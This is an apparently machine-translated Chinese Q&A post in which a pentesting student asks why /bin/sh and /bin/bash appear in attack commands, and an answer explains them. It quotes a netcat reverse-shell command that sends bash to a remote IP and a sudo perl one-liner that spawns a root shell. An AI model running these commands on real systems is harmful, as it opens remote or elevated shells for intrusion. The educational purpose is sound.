在某些紧急情况下使用/ bin /

问题描述 投票:0回答:1

在我的Pentester学习期间,我已经注意到在某些情况下以及在某些命令中(例如在反向shell中)使用/ bin /的很多知识。

nc -nv 192.168.0.6 1234 -e /bin/bash

例如,在机器上攀登特权时:

sudo /usr/bin/perl -e 'exec "/bin/sh"'

我试图搜索互联网并观看几个视频,但是他们从不解释此文件夹在这种情况下的工作原理,为什么我需要在反向shell时运行/ bin / bash,或者为什么/ bin / perl/ bin / sh被使用了吗?

linux netcat bin gnome-terminal reverse-shell
1个回答
0
投票

Pentesting就是使用您可以使用的工具来实现目标。

在您的第一个示例中,您正在打开反向外壳。我们监听与netcat的传入连接,但是我们要做的不仅仅是监听-我们希望传入的Shell是交互式的。为此,我们使用-e选项将传入的连接通过管道传递到本地bash提示符。在这种情况下,您可以轻松使用sh或zsh或任何其他方法。应当注意,大多数netcat安装中都不存在-e选项,因此,这只是反向shell的one示例,您应该准备好很多-有些可以工作,有些则不能。 。

在您的第二个示例中,我们使用perl升级特权,这是我们发现无需提升特权就可以在远程计算机上访问的二进制文件。我们最终希望以比我们已经拥有的更高的特权与远程主机进行交互,并且在许多情况下,像perl这样的事情可能会对我们做到这一点(出于许多任意原因!)。我们可以利用这一事实,再加上perl允许我们运行任意代码的事实,来运行perl代码的片段:

exec "/bin/sh"

perl中的exec命令将运行一个可执行文件,在本例中为/bin/sh shell。此shell将在perl的privelege级别上运行,因此我们已经有效地以比以前更高的特权打开了shell。

Perl的-e选项正在调用要运行的脚本或perl行,这只是两个命令都具有-e的巧合。他们的意思是分开的东西。

要点:有很多原因会导致您输入命令来执行各种操作。有大量的反向炮弹,无数种提升权限的方式,以及一百万种不同的枚举技术。当您获得要运行的命令时,请花一点时间查看该命令的文档,以查找每个标志的作用,为什么使用这些参数以及其工作方式。做笔测试员做笔记会比任何其他技术快得多,因为“ Pentesting”是一种数字游戏-您想尝试尽可能多的事情,看看有什么用。

© www.soinside.com 2019 - 2024. All rights reserved.